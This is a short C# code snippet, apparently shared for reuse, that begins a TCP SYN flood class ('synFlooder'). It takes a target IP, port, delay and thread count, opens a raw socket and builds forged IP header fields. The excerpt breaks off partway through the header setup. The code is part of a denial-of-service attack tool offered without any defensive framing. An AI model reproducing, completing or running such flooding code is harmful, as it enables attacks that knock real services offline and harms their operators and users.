TCP syn flood method with these args: string ip, int port, int delay, int threads
class synFlooder : Flooder { public override void attack(string ip, int port, int delay, int threads) { try { // the socket class Socket s = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Tcp); // packet struct structs.IPHeader ipHeader = new structs.IPHeader(); structs.TCPHeader tcpHeader = new structs.TCPHeader(); // some random ports Random r = new Random(); // the ip address IPAddress dest = IPAddress.Parse(ip); // ip header ipHeader.ip_verlen = 0x45; ipHeader.ip_tos = 0x00; ipHeader.ip_totallength = 0; ipHeader.ip_id = 0; ipHeader.ip_offset = 0; ipHeader.ip_ttl = 0xFF; ipHeader.ip_protocol = 0x06;